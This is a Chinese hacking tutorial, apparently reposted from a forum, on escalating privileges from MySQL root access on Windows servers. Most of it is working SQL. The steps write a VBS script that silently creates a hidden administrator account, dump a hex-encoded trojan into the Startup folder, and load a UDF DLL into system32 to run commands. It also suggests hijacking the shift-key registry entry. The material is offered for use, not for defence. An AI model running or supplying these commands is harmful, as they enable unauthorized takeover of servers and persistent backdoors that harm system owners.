Cisco技术 无忧网客联盟

摘要：本文源自网络，由黑白前线收集整理发布！MYSQL提权我在前面已经写的很明白了，但是还有一些朋友ROOT连接上了，但是无法执行CMD。 无论执行什么都返回：数据库查讯出错，请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't ope...
作者：FoolishQiang

MYSQL提权我在前面已经写的很明白了，但是还有一些朋友ROOT连接上了，但是无法执行CMD。无论执行什么都返回：

数据库查讯出错，请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 0 )

////////////////////////////////////

那么我们在利用服务器组件来进行VBS提权：

///////////////////

构造语句：

/////////////////

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"") " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user foolishqiang foolishqiang /add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators foolishqiang /add"",0) " );

///////////////////////

后面我加了一个参数：0，意思为默默的执行。没有任何回显。0表示不弹出CMD窗口，安静的运行。

////////////////////////////////////

上面的方法一般在加上我以前写的一个MYSQL提权应该能解决提权的问题了。我们也可以以16进制写exe文件

///////////////////////////

create table a (cmd BLOB);

insert into a values （CONVERT(木马的16进制代码,CHAR));

select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\foolishqiang.exe'

注意：路径一定要写\\ 俩个 因为要过滤一个\

///////////////////////////////////////////////

应该说root的总结的差不多了 包括了dll提权。已经导vbs提权。exe提权，Linx Mysql BackDoor提权等。

如果还要深入的话。干点root

还有MIX.DLL。

create table temp_mix(abc longblob);
insert into temp_mix values(load_file('D:\\\udf.dll')); ///////////路径
select * from temp_mix into dumpfile 'C:\\Windows\\system32\\udf.dll';
create function MyCmd returns string soname 'udf.dll';
select MyCmd('net user');
drop table if exists temp_mix;

这个一般用的不是很多。

/////////////////

我们也可以构造语句，来劫持注册表shift。而不去替换（有保护）。这样也可以进行提权。

Root的提权方法我基本已经都说了。

小菜愚见，大牛不要见笑